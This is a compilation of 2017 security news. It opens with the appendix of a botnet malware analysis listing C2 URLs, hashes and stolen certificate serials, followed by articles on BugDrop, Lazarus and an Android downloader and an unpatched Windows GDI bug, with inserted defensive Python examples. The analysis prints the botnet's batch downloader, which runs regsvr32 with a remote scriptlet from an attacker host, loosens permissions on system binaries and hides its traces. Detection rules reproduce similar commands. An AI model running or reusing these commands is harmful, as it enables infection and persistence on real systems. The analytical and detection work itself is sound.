This botnet operator hosts components embedded within jpeg comments, a technique they have been using since 2013. These techniques produce very large file objects. So, even a fresh image of Taylor Swift downloaded by this bot contains 2.3 MB of keylogging code first seen on 2016.10.30 (ad0496f544762a95af11f9314e434e94):

Modular bot code

Also interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (SQL injection) and brute forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various attacks. The bots are instructed on individual tasks via an encrypted file downloaded from the available C2.

[Cracker:IPC][Cracker:MSSQL][Cracker:MySQL][Cracker:RDP][Cracker:SSH][Cracker:RDP][Cracker:Telnet][Cracker:WMI]
The Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken out across source libraries:

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
cService.cpp
CThreadPool.cpp
Db_Mysql.cpp
Dispatcher.cpp
IpFetcher.cpp
libtelnet.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Mysql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp
catdbsvc.cpp
catadnew.cpp
catdbcli.cpp
waitsvc.cpp
errlog.cpp

Code signing certificates

The code signing certificates appear to have been stolen from a solar and semiconductor grinding-wafer products manufacturer in Northwest China, plus one that has expired.

Kaspersky Lab products detect and prevent infections from these bots.

File object scan verdicts

Trojan.Win32.SelfDel.ehlq
Trojan.Win32.Agent.ikad
Trojan.Win32.Agentb.btlt
Trojan.Win32.Agentb.budb
Trojan.Win32.Zapchast.ajbs
Trojan.BAT.Starter.hj
Trojan-PSW.Win32.Agent.lsmj
Trojan-Downloader.Win32.Agent.hesn
Trojan-Downloader.Win32.Agent.silgjn
HEUR:Trojan-Downloader.Linux.Gafgyt.b
Backdoor.Win32.Agent.dpeu
DangerousPattern.Multi.Generic (UDS)

Behavioral verdicts

Trojan.Win32.Generic
Trojan.Win32.Bazon.a
Trojan.Win32.Truebadur.a
DangerousObject.Multi.Chupitio.a

Appendix

c2 and url

http://dwon.f321y[.]com:280/mysql.exe
http://downs.f4321y[.]com:280/psa.jpg
https://down2.b5w91[.]com:8443
http://down.f4321y[.]com:8888/kill.html
http://down.f4321y[.]com:8888/test.html
http://down.f4321y[.]com:8888/ups.rar
http://67.229.225.20
http://down.f4321y[.]com
http://up.f4321y[.]com
http://up.f4321y[.]com:8888/ver.txt
http://up.f4321y[.]com:8888/ups.rar
http://up.f4321y[.]com:8888/update.txt
http://up.f4321y[.]com:8888/wpdmd5.txt
http://up.f4321y[.]com:8888/wpd.dat
http://down.F4321Y[.]com:8888/my1.html
http://up.mykings[.]pw:8888/ver.txt
http://up.mykings[.]pw:8888/ups.rar
http://up.mykings[.]pw:8888/update.txt
http://up.mykings[.]pw:8888/wpdmd5.txt
http://up.mykings[.]pw:8888/wpd.dat
http://down.mykings[.]pw:8888/my1.html
http://down.mykings[.]pw:8888/ups.rar
http://down.mykings[.]pw:8888/item.dat
http://js.f4321y[.]com:280/v.sct
http://down.b591[.]com:8888/ups.exe
http://down.b591[.]com:8888/ups.rar
http://down2.b591[.]com:8888/ups.rar
http://down2.b591[.]com:8888/wpd.dat
http://down2.b591[.]com:8888/wpdmd5.txt
http://down2.b591[.]com:8888/ver.txt
http://up.f4321y[.]com:8888/ups.rar
http://ww3.sinaimg[.]cn/mw690/717a8b4dgw1f99ly7blarj20c40e4b2a.jpg
http://img1.timeface[.]cn/times/a4c7eb57bb7192a226ac0fb6a80f2164.jpg
http://downs.b591[.]com:280/ppsa.jpg
http://down.b591[.]com:8888/test.html
http://downs.b591[.]com:280/pps.jpg
http://dwon.kill1234[.]com:280/cao.exe
http://down.b591[.]com:8888/ups.rar
http://down.b591[.]com:8888/ups.exe
http://down.b591[.]com:8888/cab.rar
http://down.b591[.]com:8888/cacls.rar
http://down.b591[.]com:8888/kill.html

Certificates

Xi’ an JingTech electronic Technology Co.,LTD
sn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36
Partner Tech(Shanghai)Co.,Ltd
sn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89

Md5

e7761db0f63bc09cf5e4193fd6926c5e
c88ece9a379f4a714afaf5b8615fc66c
91a12a4cf437589ba70b1687f5acad19
a3c09c2c3216a3a24dce18fd60a5ffc2
297d1980ce171ddaeb7002bc020fe6b6
5707f1e71da33a1ab9fe2796dbe3fc74
a4c7eb57bb7192a226ac0fb6a80f2164
64f0f4b45626e855b92a4764de62411b
02b0021e6cd5f82b8340ad37edc742a0
10164584800228de0003a37be3a61c4d
fd7f188b853d5eef3760228159698fd8
cbe2648663ff1d548e036cbe4351be39
fb7b79e9337565965303c159f399f41b
eb814d4e8473e75dcbb4b6c5ab1fa95b
04eb90800dff297e74ba7b81630eb5f7
508f53df8840f40296434dfb36087a17
93ccd8225c8695cade5535726b0dd0b6
62270a12707a4dcf1865ba766aeda9bc
43e7580e15152b67112d3dad71c247ec
0779a417e2bc6bfac28f4fb79293ec34
ac8d3581841b8c924a76e7e0d5fced8d
cf1ba0472eed104bdf03a1712b3b8e3d
4eee4cd06367b9eac405870ea2fd2094
21d291a8027e6de5095f033d594685d0
097d32a1dc4f8ca19a255c401c5ab2b6
5950dfc2f350587a7e88fa012b3f8d92
2d411f5f92984a95d4c93c5873d9ae00
9a83639881c1a707d8bbd70f871004a0
5cae130b4ee424ba9d9fa62cf1218679
2346135f2794de4734b9d9a27dc850e1
fe7d9bdbf6f314b471f89f17b35bfbcd
c289c15d0f7e694382a7e0a2dc8bdfd8
9098e520c4c1255299a2512e5e1135ba
db2a34ac873177b297208719fad97ffa
defff110df48eb72c16ce88ffb3b2207
c75bd297b87d71c8c73e6e27348c67d5
5af3bab901735575d5d0958921174b17
1a6fea56dc4ee1c445054e6bc208ce4f
ae173e8562f6babacb8e09d0d6c29276
ad0496f544762a95af11f9314e434e94
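As an added, defender-side example (not part of the Kaspersky analysis or of this page), the Python below refangs a handful of the `[.]`-defanged indicators from the appendix above and matches them against constructed proxy log lines and a constructed file-hash inventory. The indicator values are copied from the appendix; the log format, the client addresses and the inventory entries are made up for the example.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from the appendix above. "[.]" and "hxxp" are the usual
# defanging; refang() restores them for matching only.
DEFANGED_URLS = [
    "http://down.mykings[.]pw:8888/ups.rar",
    "hxxp://up.mykings[.]pw:8888/update.txt",
    "http://js.f4321y[.]com:280/v.sct",
    "http://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg",
    "http://67.229.225.20",
]

# MD5s copied from the appendix (msinfo.exe, my1.html, ups.rar / ms.exe).
KNOWN_MD5 = {
    "5707f1e71da33a1ab9fe2796dbe3fc74",
    "64f0f4b45626e855b92a4764de62411b",
    "10164584800228de0003a37be3a61c4d",
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a real URL (for matching only)."""
    return indicator.replace("[.]", ".").replace("hxxp://", "http://")


def indicator_domains(urls=DEFANGED_URLS):
    """Lower-cased host names (ports ignored) taken from the defanged URL list."""
    return {urlsplit(refang(u)).hostname.lower() for u in urls}


# Constructed proxy log lines, "<client> <method> <url>". Not real traffic.
SAMPLE_PROXY_LOG = [
    "10.0.0.5 GET http://up.mykings.pw:8888/update.txt",
    "10.0.0.7 GET http://www.example.com/index.html",
    "10.0.0.9 GET http://down.MyKings.pw:8888/ups.rar",
    "10.0.0.9 GET http://67.229.225.20/",
]

LOG_RE = re.compile(r"^(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)")


def match_proxy_log(lines, urls=DEFANGED_URLS):
    """Return (client, host) for every line whose URL host is a known indicator."""
    domains = indicator_domains(urls)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host = (urlsplit(m.group("url")).hostname or "").lower()
        if host in domains:
            hits.append((m.group("client"), host))
    return hits


# Constructed "<path> <md5>" inventory, as an EDR file listing might export it.
SAMPLE_HASH_INVENTORY = [
    r"c:\windows\system\msinfo.exe 5707F1E71DA33A1AB9FE2796DBE3FC74",
    r"c:\windows\system32\notepad.exe 0123456789abcdef0123456789abcdef",
    r"c:\program files\kugou2010\ms.exe 10164584800228de0003a37be3a61c4d",
]


def match_hash_inventory(lines, known=KNOWN_MD5):
    """Return (path, md5) for entries whose hash is in the known-bad set.

    The path may contain spaces, so split on the last space only, and
    compare hashes case-insensitively since tools differ in casing."""
    hits = []
    for line in lines:
        path, _, digest = line.rpartition(" ")
        digest = digest.strip().lower()
        if path and digest in known:
            hits.append((path, digest))
    return hits


if __name__ == "__main__":
    print(match_proxy_log(SAMPLE_PROXY_LOG))
    print(match_hash_inventory(SAMPLE_HASH_INVENTORY))
```

Matching on host name rather than on the full URL is deliberate: the appendix shows the same paths served from several hosts and ports, so a host hit is the useful signal, and the hash match is what confirms a downloaded file on disk.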

Contents of http://down.mykings[.]pw:8888/my1.html

@echo off
mode con: cols=13 lines=1
if exist C:\downs\runs.exe start C:\downs\runs.exe
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
start regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v shell /f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
del %0
exit
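The my1.html script above and the spreader's own command lines give a defender several behaviours to alert on from process-creation telemetry: regsvr32 loading a remote scriptlet through scrobj.dll, cacls granting Everyone full control of cmd.exe and ftp.exe, attrib hiding directories under Program Files, the Run-key deletion, and the "sc start ... && del msinfo.exe" self-cleanup. The Python below, an added example that is not part of the Kaspersky write-up, encodes those as regular-expression rules and runs them over constructed Sysmon-style events; the rule names, the event dictionaries and the hostname js.example.invalid are placeholders of my own.

```python
import re

# Each rule: (name, compiled regex applied to the full command line).
# Patterns are derived from the my1.html script and the spreader behaviour
# documented above; the rule names are invented for this example.
RULES = [
    ("regsvr32_remote_scriptlet",
     re.compile(r"regsvr32(\.exe)?\s.*\s/i:https?://.*scrobj\.dll", re.I)),
    ("cacls_everyone_full_on_system_binary",
     re.compile(r"cacls(\.exe)?\s+\S*(cmd|ftp)\.exe\s.*\beveryone:f\b", re.I)),
    ("hidden_dir_under_program_files",
     re.compile(r"attrib\s+\+s\s+\+h\s+c:\\progra~1\\", re.I)),
    ("run_key_deletion",
     re.compile(r'reg(\.exe)?\s+delete\s+"?hklm\\software\\microsoft\\windows\\currentversion\\run', re.I)),
    ("service_start_then_self_delete",
     re.compile(r"\bsc\s+start\s+\S+.*&.*\bdel\b", re.I)),
    ("msinfo_in_system_dir",
     re.compile(r"c:\\windows\\system\\msinfo\.exe\b", re.I)),
]


def rule_names(command_line: str):
    """Names of every rule the command line triggers, in RULES order."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan_events(events):
    """events: iterable of dicts with at least a 'cmdline' key (Sysmon-like).

    Returns one finding per event that triggered at least one rule."""
    findings = []
    for ev in events:
        names = rule_names(ev.get("cmdline", ""))
        if names:
            findings.append({"image": ev.get("image"), "cmdline": ev["cmdline"], "rules": names})
    return findings


# Constructed process-creation events. js.example.invalid and the vendor
# path are placeholders; the third event is benign and must not fire.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /u /s /i:http://js.example.invalid:280/v.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\cacls.exe",
     "cmdline": "cacls cmd.exe /e /g everyone:f"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\helper.dll"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"c:\windows\system32\cmd.exe /c sc start xWinWpdSrv&ping 127.0.0.1 -n 6 && del c:\windows\system\msinfo.exe >> NUL"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v shell /f'},
    {"image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib +s +h C:\Progra~1\kugou2010"},
]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding["rules"], finding["cmdline"])
```

The regsvr32 rule is the one worth tuning most carefully: plain `regsvr32 /s some.dll` is everyday administrative noise, so the rule requires both a remote `/i:http` argument and scrobj.dll, which is exactly the combination the script uses and one that legitimate installers almost never produce.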

Contents of http://up.mykings[.]pw:8888/update.txt

http://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\windows\system\msinfo.exe

http://down.mykings[.]pw:8888/my1.html c:\windows\system\my1.bat


Malware Hijacks Microphones to Spy On Ukrainian Businesses, Scientists and Media
21.2.2017 thehackernews Virus

Ukraine has once again been a target of a potential hacking attack that infected computer systems from dozens of Ukrainian businesses with highly sophisticated malware, allowing hackers to exfiltrate sensitive data and eavesdrop on their network.
Late last year, the country also suffered a power outage caused by the same group of hackers that targeted Ukraine's power grid with the BlackEnergy malware in late 2015, causing 225,000 residents to lose electricity.
Now security researchers from threat intelligence firm CyberX have uncovered an advanced malware-based operation that has already siphoned over 600 gigabytes of data from about 70 victim organizations, including critical infrastructure, news media, and scientific research.
Operation BugDrop: Damages and Modus Operandi
Dubbed "Operation BugDrop," the large-scale malware campaign has mainly been perpetrated against targets in Ukraine, though targets in Russia, Saudi Arabia, and Austria were also hit.
CyberX researchers did not identify the clandestine hacking collective but said Operation BugDrop was believed to be the work of highly skilled, government-backed nation-state hackers with nearly limitless resources.
"Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources," reads the CyberX blog post published Wednesday.
"In particular, the operation requires a massive back-end infrastructure to store, decrypt, and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics."
Here's What the Malware Does:
Operation BugDrop uses sophisticated malware that has been designed to infiltrate the victim's computer and capture screen shots, documents, and passwords, and turn on the PC's microphone to capture audio recordings of all conversations.
The mysterious hacking group infects victims using malicious Microsoft Word documents sent in phishing emails. Once infected, the compromised PCs send the pilfered audio and data to Dropbox, where the hackers retrieve it.
Since the malware uses PC microphones to bug targets and then send the audio and other data files to Dropbox, the researchers have dubbed the malware campaign Operation BugDrop.
Here's How BugDrop Works:

The hackers spread the malware through phishing emails containing Microsoft Office file attachments that include malicious macros embedded in it.
Once the targets open the malware-laden Word document, the hidden, malicious Visual Basic scripts start running in a temporary folder in the background.
The main module of BugDrop downloads the various data-stealing plugins to infected machines and executes them. All the stolen data the malware collects is then uploaded to Dropbox.
Although BugDrop has mainly been designed to record audio files, the malware can also steal documents, passwords and other sensitive data from the computer's browsers.
Techniques BugDrop Uses to Avoid Detection:
The main malware downloader has low detection rates because:
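The infection chain described above starts with a Word attachment carrying a VBA macro. One cheap check a mail gateway or triage script can apply before a document reaches a user is to look inside the OOXML container for a VBA project part, regardless of the file extension. The Python below is an added example, not code from CyberX or from the page; it builds two constructed in-memory documents (one with a placeholder vbaProject.bin, one without) and inspects them with the standard library only.

```python
import io
import zipfile

# OOXML parts that carry VBA code in Word, Excel and PowerPoint packages.
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
CONTENT_TYPES = "[Content_Types].xml"


def office_macro_indicators(data: bytes) -> dict:
    """Inspect an OOXML file held in memory and report macro indicators.

    Works on the container, so renaming .docm to .docx changes nothing."""
    result = {"is_ooxml": False, "has_vba_project": False,
              "content_type_macro": False, "parts": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result            # not a zip container at all (e.g. legacy .doc)
    with zf:
        names = zf.namelist()
        result["is_ooxml"] = CONTENT_TYPES in names
        result["parts"] = [n for n in names if n in MACRO_PARTS]
        result["has_vba_project"] = bool(result["parts"])
        if result["is_ooxml"]:
            ct = zf.read(CONTENT_TYPES).decode("utf-8", "replace")
            # Either the vbaProject content type or a macroEnabled main part
            # announces macros even if the binary part were renamed.
            result["content_type_macro"] = ("vnd.ms-office.vbaProject" in ct
                                            or "macroEnabled" in ct)
    return result


def build_sample(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package for the example (not a real document)."""
    ct = ('<?xml version="1.0" encoding="UTF-8"?>'
          '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
          '<Override PartName="/word/document.xml" ContentType="application/'
          'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>')
    if with_macro:
        ct += ('<Override PartName="/word/vbaProject.bin" '
               'ContentType="application/vnd.ms-office.vbaProject"/>')
    ct += "</Types>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(CONTENT_TYPES, ct)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes standing in for an OLE compound file with VBA streams.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    print(office_macro_indicators(build_sample(True)))
    print(office_macro_indicators(build_sample(False)))
```

The check only says whether a document carries VBA, not whether the VBA is malicious; in an environment where macros from external mail are not expected, that alone is enough to quarantine the attachment for analysis.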
The malware makes the audio data look like legitimate outgoing traffic.
BugDrop encrypts the DLLs that are installed to avoid detection by traditional anti-virus and sandboxing systems.
The malware uses public cloud service Dropbox.
BugDrop also uses Reflective DLL (Dynamic Link Library) Injection, a malware injection technique that had also been leveraged by the BlackEnergy malware used in the Ukrainian power grid attacks and the Duqu malware in the Stuxnet attacks on Iranian nuclear facilities.
Reflective DLL Injection is used to load malicious code and effectively sidestep security verification procedures without calling the standard Windows API.
Targets of BugDrop:
The malware has targeted a wide range of industries including critical infrastructures, research centers in Ukraine and media organizations.
According to CyberX, BugDrop's primary target has been Ukraine, but it has also been traced to Russia, Saudi Arabia, and Austria.
Operation BugDrop targets identified by the CyberX researchers so far include:
A firm that designs remote monitoring systems for oil and gas pipeline infrastructures.
An engineering firm that designs electrical substations, water supply plants and gas distribution pipelines.
An international organization that monitors counter-terrorism, human rights, and cyber attacks on critical infrastructure in the Ukraine.
A scientific research institute.
Editors of Ukrainian newspapers.
While concluding the report, CyberX said both private and public sector organizations need to be more vigilant in monitoring their networks and applying more modern technologies like behavioral analytics to identify and quickly respond to these increasingly sophisticated cyber attacks.


Experts at BAE Systems found false flags in the Lazarus malware
21.2.2017 securityaffairs Virus

Security experts who analyzed the malware used in the attacks against the Polish banks discovered false flags in the Lazarus malicious code.
A few weeks ago, security experts reported that the systems of several Polish banks were targeted by hackers. The systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.

Both security firms BAE Systems and Symantec started their investigation on the attacks. According to Symantec, the threat actor behind the attack is the same that targeted financial organizations in 31 countries since at least October 2016.

Polish bank attackers Lazarus Group APT Top Countries Targeted

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

Malware researchers at Symantec have identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. The attackers focused their activities on the banks, but the list of victims also includes ISPs and telecom operators.

Now further revelations have emerged from the investigation conducted by the security firms: the threat actors unsuccessfully attempted to trick researchers into attributing their operation to Russian-speaking hackers.

The researchers believe that the threat actors conducted false flag operations to deceive investigators and make attribution of the attack more difficult.

Experts at BAE Systems have dissected half a dozen malware samples and discovered several Russian words in the source code.

“Once the bot has established communication with the remote C&C, it uses several transliterated Russian words to either indicate the state of its communication or issue backdoor commands, such as:

Word | State/Backdoor Command
“Nachalo” | start communication session
“ustanavlivat” | handshake state
“poluchit” | receive data
“pereslat” | send data
“derzhat” | maintain communication session
“vykhodit” | exit communication session
A deeper analysis conducted by the researchers revealed that the commands were likely the result of an online translation.

“In spite of some ‘Russian’ words being used, it is evident that the malware author is not a native Russian speaker.” states the blog post published by BAE Systems.
“Of our previous examples, five of the commands were likely produced by an online translation. Below we provide the examples and the correct analogues for reference:”

Word | Type of error | Correct analogue
“ustanavlivat” | omitted sign at the end, verb tense error | “ustanovit'” or “ustanoviti”
“poluchit” | omitted sign at the end | “poluchit'” or “poluchiti”
“pereslat” | omitted sign at the end | “pereslat'” or “pereslati”
“derzhat” | omitted sign at the end | “derzhat'” or “derzhati”
“vykhodit” | omitted sign at the end, verb tense error | “vyiti”
Several words are written as they are pronounced.

“Through reverse-engineering, we can see the use of many Russian words that have been translated incorrectly. In some cases, the inaccurate translations have transformed the meaning of the words entirely. This strongly implies that the authors of this attack are not native Russian speakers and, as such, the use of Russian words appears to be a ‘false flag’,” continues the analysis.

The threat actor is clearly switching tactics and evolving its modus operandi to avoid detection and make attribution of the attacks harder.


Trojan Downloader Masquerades as Defunct Flash Player for Android

20.2.2017 securityweek Android
A recently observed malware downloader targeting Android users is masquerading as an update for Adobe Flash Player, ESET researchers warn.

Although the Flash Player for Android was discontinued nearly half a decade ago, cybercriminals are still abusing it to trick unsuspecting users into downloading and installing their malicious programs. As always, the attackers rely on users’ willingness to download and install a fake update when prompted to do so via a well-designed, legitimate-looking update screen.

Dubbed Android/TrojanDownloader.Agent.JI, the newly discovered threat uses this technique to infect the devices of users navigating social media or adult sites. Following installation, the malware presents more deceptive screens to its victims, to trick them into granting it special permissions in the Android accessibility menu, which then allow it to download and execute additional malware.

For that, the Trojan displays a fake screen informing the victim of “too much consumption of energy” and urging that a “Saving Battery” mode be enabled. Like most malware, this downloader won’t take no for an answer and continues to display the message until the user agrees to enable the service.

At this point, the malware takes the victim to the Android Accessibility menu, which displays a list of services with accessibility functions, including a new service that the malware has created during the installation process, called “Saving battery.” When the user enables it, it requests permissions to monitor actions, retrieve window content, and turn on explore by touch.

As soon as the service has been enabled, the fake Flash Player icon is hidden from the user, although the malware runs in the background. It contacts the command and control (C&C) server to deliver information about the infected device and receive a link to a malicious app to download (which could be banking malware, ransomware, adware, or spyware).

After receiving the link, the malware displays a bogus lockscreen that the user can’t dismiss, in an attempt to mask the nefarious activities it is engaged in. Because it has the permission to mimic the user’s clicks, the Trojan can now “download, install, execute and activate device administrator rights for additional malware without the user’s consent, all while remaining unseen under the fake lock screen,” ESET explains.

To remove the malicious program, users should head to Settings -> Application Manager and try to manually uninstall it. However, should the malware have Device admin rights enabled (it requests those as well in some cases), users should head to Settings -> Security -> Flash-Player and deactivate those first.

Uninstalling the downloader, however, might prove only a partial solution, as the malware fetched and installed by the threat would remain on the infected device. Victims should install a mobile security application to perform a full cleanup.

To stay protected, users are advised to avoid installing applications from third-party, untrusted websites, but use only legitimate app stores, such as Google Play, instead. Users should also pay close attention to the permissions newly installed programs request, as those that don’t seem appropriate for the software’s functions might be a giveaway of malicious intent.


Google Discloses Unpatched Windows GDI Vulnerability

20.2.2017 securityweek Vulnerability
An unpatched vulnerability affecting the Windows Graphics Device Interface (Windows GDI) was publicly disclosed last week after Microsoft failed to address it within 90 days after being notified.

The issue was disclosed by Mateusz Jurczyk, an engineer with Google's Project Zero team, who initially discovered it along with other bugs in the user-mode Windows GDI library (gdi32.dll) in March 2016. Microsoft attempted to address these issues with the June 2016 set of monthly patches (security bulletin MS16-074), but apparently failed to do so.

While taking a look at the patched gdi32.dll, the Google security researcher discovered that some of the bugs were indeed resolved, but that others were still presenting security risks. In November 2016, the researcher filed another report to inform Microsoft on his findings.

Under Google Project Zero’s policy, vendors are given 90 days to resolve reported vulnerabilities before they become public knowledge. As soon as the 90 days passed, the report went public, along with a proof-of-concept published by Jurczyk.

This public disclosure, however, appears to have been timed with the publishing of Microsoft’s February 2017 security update, which was expected to happen on February 14, but was delayed for one month “due to a last minute issue that could impact some customers.” The patches were expected to resolve a previously revealed high risk SMB 0-day as well.

Tracked as CVE-2017-0038, the newly disclosed vulnerability is related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records. Last year, Google’s Jurczyk found missing checks “in at least 10 different records,” and says that Microsoft was able to address only some of them with MS16-074, while others still pose security risks.

Jurczyk notes that a careful audit of all EMF record handlers that deal with DIBs is required, to ensure that every one of them correctly enforces all four of the conditions set out in his report. If not all conditions are enforced, invalid memory access (and subsequent memory disclosure) while processing the bitmaps is possible.
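The class of bug described here is a DIB whose header promises more data than the enclosing record actually carries. As an added illustration that is not from the Project Zero report or from this page (which does not reproduce Jurczyk's four conditions), the Python below shows the generic bounds checks a record handler needs before it trusts an embedded BITMAPINFOHEADER: the BITMAPINFO block and the pixel block must both lie inside the record, the colour table the header announces must fit in the BITMAPINFO block, and the pixel bytes implied by width, height and bit depth must not exceed the pixel block. The 24-byte record prefix used to carry the offsets is a constructed layout for the example, not the real EMF record format; only the 40-byte BITMAPINFOHEADER is the genuine Windows structure.

```python
import struct

BIH_FMT = "<IiiHHIIiiII"            # BITMAPINFOHEADER: 40 bytes, little-endian
BIH_SIZE = struct.calcsize(BIH_FMT)
BI_RGB = 0

# Constructed record prefix (NOT the real EMR layout): iType, nSize,
# offBmi, cbBmi, offBits, cbBits, all unsigned 32-bit, offsets record-relative.
PREFIX_FMT = "<IIIIII"
PREFIX_SIZE = struct.calcsize(PREFIX_FMT)   # 24


class DibError(ValueError):
    """Raised when a DIB does not fit the record that carries it."""


def validate_dib(record: bytes, off_bmi: int, cb_bmi: int, off_bits: int, cb_bits: int) -> dict:
    n_size = len(record)
    # 1. BITMAPINFO block inside the record and large enough for a full header.
    #    Compare cb against (n_size - off) rather than off + cb against n_size:
    #    in C the addition of two attacker-controlled DWORDs can wrap around.
    if off_bmi > n_size or cb_bmi < BIH_SIZE or cb_bmi > n_size - off_bmi:
        raise DibError("BITMAPINFO block outside record")
    # 2. Pixel block inside the record.
    if off_bits > n_size or cb_bits > n_size - off_bits:
        raise DibError("pixel block outside record")
    (bi_size, width, height, _planes, bpp, comp,
     _size_image, _xppm, _yppm, clr_used, _clr_imp) = struct.unpack_from(BIH_FMT, record, off_bmi)
    if bi_size < BIH_SIZE or bi_size > cb_bmi:
        raise DibError("biSize inconsistent with cbBmi")
    # 3. Colour table announced by the header must fit in the BITMAPINFO block.
    if bpp in (1, 4, 8):
        entries = clr_used or (1 << bpp)
        if entries * 4 > cb_bmi - bi_size:
            raise DibError("colour table outside BITMAPINFO block")
    elif bpp not in (16, 24, 32):
        raise DibError("unsupported biBitCount %d" % bpp)
    if comp != BI_RGB:
        raise DibError("only BI_RGB is handled in this example")
    if width <= 0 or height == 0:
        raise DibError("invalid dimensions")
    # 4. Pixel bytes implied by the header must not exceed the pixel block.
    stride = ((width * bpp + 31) // 32) * 4      # rows are padded to 4 bytes
    needed = stride * abs(height)
    if needed > cb_bits:
        raise DibError("header implies %d pixel bytes, record carries %d" % (needed, cb_bits))
    return {"width": width, "height": height, "bpp": bpp, "stride": stride, "pixel_bytes": needed}


def build_record(width, height, bpp, pixel_bytes, cb_bits_claimed=None) -> bytes:
    """Constructed record: prefix + BITMAPINFOHEADER + zeroed pixel data.

    cb_bits_claimed lets a test lie about the pixel block size, as a
    malformed file would."""
    hdr = struct.pack(BIH_FMT, BIH_SIZE, width, height, 1, bpp, BI_RGB, 0, 0, 0, 0, 0)
    pixels = bytes(pixel_bytes)
    off_bmi = PREFIX_SIZE
    off_bits = off_bmi + len(hdr)
    cb_bits = len(pixels) if cb_bits_claimed is None else cb_bits_claimed
    n_size = PREFIX_SIZE + len(hdr) + len(pixels)
    return struct.pack(PREFIX_FMT, 81, n_size, off_bmi, len(hdr), off_bits, cb_bits) + hdr + pixels


def parse_record(record: bytes) -> dict:
    if len(record) < PREFIX_SIZE:
        raise DibError("record shorter than prefix")
    _, n_size, off_bmi, cb_bmi, off_bits, cb_bits = struct.unpack_from(PREFIX_FMT, record, 0)
    if n_size > len(record):
        raise DibError("nSize exceeds available bytes")
    return validate_dib(record[:n_size], off_bmi, cb_bmi, off_bits, cb_bits)


def record_is_safe(record: bytes) -> bool:
    try:
        parse_record(record)
        return True
    except DibError:
        return False


if __name__ == "__main__":
    print(parse_record(build_record(4, 2, 24, 24)))       # 4x2, 24bpp: stride 12, 24 bytes
    print(record_is_safe(build_record(4, 2, 24, 8)))      # header wants 24 bytes, only 8 present
```

Each failing case corresponds to a read past the end of the record in a handler that trusts the header, which is exactly the memory disclosure the article describes; the check on the colour table is the one most often forgotten, because an 8-bit image with biClrUsed left at zero implicitly claims 1024 bytes of palette.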

The security researcher managed to reproduce the vulnerability locally in Internet Explorer and remotely in Office Online, via a .docx document containing the specially crafted EMF file. The flaw is considered Medium severity.

